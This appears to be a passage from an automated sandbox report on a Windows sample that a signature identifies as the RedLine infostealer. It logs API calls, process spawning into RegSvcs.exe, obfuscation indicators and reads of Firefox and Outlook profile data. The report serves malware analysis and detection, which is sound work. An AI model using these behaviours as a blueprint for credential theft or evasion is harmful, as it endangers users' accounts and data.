                Source: 00000003.00000002.4149885312.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                Source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, KLhJmaON.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, KLhJmaON.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, 9HIFdl.csCryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, 9HIFdl.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@2/2
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0A2D5 GetLastError,FormatMessageW,0_2_00B0A2D5
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AF8713 AdjustTokenPrivileges,CloseHandle,0_2_00AF8713
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AF8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00AF8CC3
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00B0B59E
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B1F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00B1F121
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B186D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00B186D0
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AA4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00AA4FE9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeFile created: C:\Users\user\AppData\Local\Temp\aut6482.tmpJump to behavior
                Source: GkYUK8VCrO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: GkYUK8VCrO.exeReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Users\user\Desktop\GkYUK8VCrO.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeProcess created: C:\Users\user\Desktop\GkYUK8VCrO.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeProcess created: C:\Users\user\Desktop\GkYUK8VCrO.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                Source: GkYUK8VCrO.exeStatic file information: File size 1623552 > 1048576
                Source: GkYUK8VCrO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: GkYUK8VCrO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: GkYUK8VCrO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: GkYUK8VCrO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: GkYUK8VCrO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: GkYUK8VCrO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: GkYUK8VCrO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: GkYUK8VCrO.exe, 00000000.00000003.1681182332.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000000.00000003.1680747519.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692054040.0000000003900000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692800812.0000000003760000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: GkYUK8VCrO.exe, 00000000.00000003.1681182332.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000000.00000003.1680747519.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692054040.0000000003900000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692800812.0000000003760000.00000004.00001000.00020000.00000000.sdmp
                Source: GkYUK8VCrO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: GkYUK8VCrO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: GkYUK8VCrO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: GkYUK8VCrO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: GkYUK8VCrO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                Data Obfuscation

                barindex
                Source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B1C304 LoadLibraryA,GetProcAddress,0_2_00B1C304
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B08719 push FFFFFF8Bh; iretd 0_2_00B0871B
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00ACE94F push edi; ret 0_2_00ACE951
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00ACEA68 push esi; ret 0_2_00ACEA6A
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AC8B85 push ecx; ret 0_2_00AC8B98
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00ACEC43 push esi; ret 0_2_00ACEC45
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00ACED2C push edi; ret 0_2_00ACED2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C40C push cs; iretd 3_2_0041C4E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00423149 push eax; ret 3_2_00423179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C50E push cs; iretd 3_2_0041C4E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004231C8 push eax; ret 3_2_00423179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040E21D push ecx; ret 3_2_0040E230
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C6BE push ebx; ret 3_2_0041C6BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040BB97 push dword ptr [ecx-75h]; iretd 3_2_0040BBA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02F64B95 push ds; iretd 3_2_02F64B9B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02F6475C push ebx; retf 3_2_02F64762
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06D126A7 push cs; iretd 3_2_06D126AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06D1D39A push esp; ret 3_2_06D1D3A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06E5EF35 push dword ptr [ecx+ecx-75h]; iretd 3_2_06E5EF3B
                Source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CCk2q9xfqmQhH', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CCk2q9xfqmQhH', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                Source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CCk2q9xfqmQhH', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AA4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00AA4A35
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B255FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B255FD
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AC33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00AC33C7
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
